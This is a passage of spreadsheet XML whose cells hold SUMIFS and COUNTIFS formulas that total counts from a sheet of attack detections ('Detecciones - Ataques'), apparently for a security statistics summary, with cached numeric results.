        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>1</v>
      </c>
      <c r="BD69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>792</v>
      </c>
      <c r="BI69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>19</v>
      </c>
      <c r="BL69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>150381</v>
      </c>
      <c r="BN69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>9347</v>
      </c>
      <c r="BO69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>12</v>
      </c>
      <c r="BT69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>2</v>
      </c>
      <c r="BU69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>4</v>
      </c>
      <c r="BX69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>20</v>
      </c>
      <c r="CA69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>4</v>
      </c>
      <c r="CG69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>13</v>
      </c>
      <c r="CL69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>162</v>
      </c>
      <c r="CN69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>8</v>
      </c>
      <c r="CP69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>40</v>
      </c>
      <c r="CQ69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>3</v>
      </c>
      <c r="CR69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>4</v>
      </c>
      <c r="CU69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>11</v>
      </c>
      <c r="CY69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>48</v>
      </c>
      <c r="CZ69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>5</v>
      </c>
      <c r="DE69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>8</v>
      </c>
      <c r="DF69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>474</v>
      </c>
      <c r="DI69" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>5505</v>
      </c>
      <c r="DJ69" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DA3:$DA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>15</v>
      </c>
      <c r="DK69" s="271"/>
      <c r="DO69" s="279"/>
      <c r="DP69" s="271"/>
      <c r="DQ69" s="271"/>
      <c r="DR69" s="271"/>
      <c r="DS69" s="271"/>
      <c r="DT69" s="271"/>
      <c r="DU69" s="271"/>
      <c r="DV69" s="271"/>
      <c r="DW69" s="271"/>
      <c r="DX69" s="271"/>
      <c r="DY69" s="271"/>
      <c r="DZ69" s="271"/>
      <c r="EA69" s="271"/>
      <c r="EB69" s="271"/>
      <c r="EC69" s="271"/>
      <c r="ED69" s="280"/>
      <c r="EG69" s="279"/>
      <c r="EH69" s="271"/>
      <c r="EI69" s="271"/>
      <c r="EJ69" s="271"/>
      <c r="EK69" s="271"/>
      <c r="EL69" s="271"/>
      <c r="EM69" s="271"/>
      <c r="EN69" s="271"/>
      <c r="EO69" s="271"/>
      <c r="EP69" s="271"/>
      <c r="EQ69" s="271"/>
      <c r="ER69" s="478"/>
      <c r="ES69" s="271"/>
      <c r="ET69" s="271"/>
      <c r="EU69" s="271"/>
      <c r="EV69" s="271"/>
      <c r="EW69" s="271"/>
      <c r="EX69" s="271"/>
      <c r="EY69" s="271"/>
      <c r="EZ69" s="271"/>
      <c r="FA69" s="280"/>
      <c r="FD69" s="480"/>
      <c r="FE69" s="480"/>
      <c r="FF69" s="480"/>
      <c r="FG69" s="480"/>
      <c r="FH69" s="480"/>
      <c r="FI69" s="480"/>
      <c r="FJ69" s="480"/>
      <c r="FK69" s="480"/>
      <c r="FL69" s="480"/>
      <c r="FM69" s="480"/>
      <c r="FN69" s="480"/>
      <c r="FO69" s="480"/>
      <c r="FP69" s="480"/>
      <c r="FQ69" s="480"/>
      <c r="FR69" s="480"/>
      <c r="FS69" s="480"/>
      <c r="FT69" s="480"/>
      <c r="FU69" s="480"/>
      <c r="FV69" s="480"/>
      <c r="FW69" s="480"/>
      <c r="FX69" s="480"/>
      <c r="FY69" s="379" t="s">
        <v>1725</v>
      </c>
      <c r="FZ69" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY52)+SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY52 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY52)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY52 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GA69" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY52)+SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY52 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY52)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY52 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GB69" s="480"/>
      <c r="GC69" s="379" t="s">
        <v>1725</v>
      </c>
      <c r="GD69" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY52)+SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY52 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY52)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY52 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GE69" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY52)+SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY52 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY52)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY52 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GF69" s="480"/>
      <c r="GG69" s="480"/>
      <c r="GH69" s="480"/>
      <c r="GI69" s="480"/>
      <c r="GJ69" s="480"/>
      <c r="GK69" s="480"/>
      <c r="GL69" s="480"/>
      <c r="GM69" s="480"/>
      <c r="GN69" s="480"/>
      <c r="GO69" s="480"/>
      <c r="GP69" s="480"/>
      <c r="GQ69" s="480"/>
      <c r="GR69" s="480"/>
      <c r="GS69" s="480"/>
      <c r="GT69" s="480"/>
      <c r="GU69" s="480"/>
      <c r="GV69" s="480"/>
      <c r="GW69" s="480"/>
      <c r="GX69" s="480"/>
      <c r="GY69" s="480"/>
      <c r="GZ69" s="480"/>
      <c r="HA69" s="480"/>
      <c r="HB69" s="480"/>
      <c r="HC69" s="480"/>
      <c r="HD69" s="480"/>
      <c r="HE69" s="480"/>
      <c r="HF69" s="480"/>
      <c r="HG69" s="480"/>
      <c r="HH69" s="480"/>
      <c r="HI69" s="480"/>
      <c r="HJ69" s="480"/>
      <c r="HK69" s="480"/>
      <c r="HL69" s="480"/>
      <c r="HM69" s="480"/>
      <c r="HN69" s="480"/>
      <c r="HO69" s="480"/>
      <c r="HP69" s="480"/>
    </row>
    <row r="70">
      <c r="J70" s="277"/>
      <c r="K70" s="496" t="s">
        <v>2550</v>
      </c>
      <c r="L70" s="292"/>
      <c r="M70" s="292"/>
      <c r="N70" s="293"/>
      <c r="O70" s="278"/>
      <c r="Q70" s="271"/>
      <c r="R70" s="352" t="s">
        <v>2537</v>
      </c>
      <c r="S70" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>42</v>
      </c>
      <c r="T70" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U70" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>762</v>
      </c>
      <c r="V70" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>88</v>
      </c>
      <c r="W70" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>26</v>
      </c>
      <c r="X70" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>91661</v>
      </c>
      <c r="Y70" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>821</v>
      </c>
      <c r="Z70" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>4704344</v>
      </c>
      <c r="AA70" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>552</v>
      </c>
      <c r="AB70" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>284</v>
      </c>
      <c r="AC70" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>66</v>
      </c>
      <c r="AD70" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>23</v>
      </c>
      <c r="AE70" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>83</v>
      </c>
      <c r="AF70" s="354">
